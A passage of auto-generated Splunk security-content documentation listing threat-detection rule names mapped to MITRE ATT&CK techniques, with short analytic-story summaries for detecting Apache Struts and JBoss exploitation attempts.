T1489

Service Stop

Impact

Anomaly
Excessive Service Stop Attempt

T1489

Service Stop

Impact

Anomaly
Excessive Usage Of Cacls App

T1222

File and Directory Permissions Modification

Defense Evasion

Anomaly
Excessive Usage Of Net App

T1531

Account Access Removal

Impact

Anomaly
Excessive Usage Of Taskkill

T1562.001

Disable or Modify Tools

Defense Evasion

Anomaly
Executables Or Script Creation In Suspicious Path

T1036

Masquerading

Defense Evasion

TTP
Grant Permission Using Cacls Utility

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Hide User Account From Sign-In Screen

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
ICACLS Grant Command

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Icacls Deny Command

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Modify ACL permission To Files Or Folder

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Modify ACLs Permission Of Files Or Folders

T1222

File and Directory Permissions Modification

Defense Evasion

Anomaly
Process Kill Base On File Path

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Schtasks Run Task On Demand

T1053

Scheduled Task/Job

Execution, Persistence, Privilege Escalation

TTP
Suspicious Driver Loaded Path

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP
Suspicious Process File Path

T1543

Create or Modify System Process

Persistence, Privilege Escalation

TTP
XMRIG Driver Loaded

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation
  • Installation


Reference


version: 1



Vulnerability

Apache struts vulnerability

Detect and investigate activities--such as unusually long `Content-Type` length, suspicious java classes and web servers executing suspicious processes--consistent with attempts to exploit Apache Struts vulnerabilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-12-06
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Suspicious Java Classes Anomaly
Unusually Long Content-Type Length Anomaly
Web Servers Executing Suspicious Processes

T1082

System Information Discovery

Discovery

TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation


Reference


version: 1


Jboss vulnerability

In March of 2016, adversaries were seen using JexBoss--an open-source utility used for testing and exploiting JBoss application servers. These searches help detect evidence of these attacks, such as network connections to external resources or web services spawning atypical child processes, among others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Web
  • Last Updated: 2017-09-14
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect attackers scanning for vulnerable JBoss servers

T1082

System Information Discovery

Discovery

TTP
Detect malicious requests to exploit JBoss servers TTP

Kill Chain Phase

  • Delivery
  • Reconnaissance


Reference


version: 1




#############
# Automatically generated by doc_gen.py in https://github.com/splunk/security_content
# On Date: 2021-09-27 18:37:39.621200 UTC
# Author: Splunk Security Research
# Contact: research@splunk.com
#############
Last modified on 28 September, 2021
  NEXT
Introduction to Splunk Analytic Stories

This documentation applies to the following versions of Splunk® Security Content: 3.29.0


Was this documentation topic helpful?

You must be logged into splunk.com in order to post comments. Log in now.

Please try to keep this discussion focused on the content covered in this documentation topic. If you have a more general question about Splunk functionality or are experiencing a difficulty with Splunk, consider posting a question to Splunkbase Answers.

0 out of 1000 Characters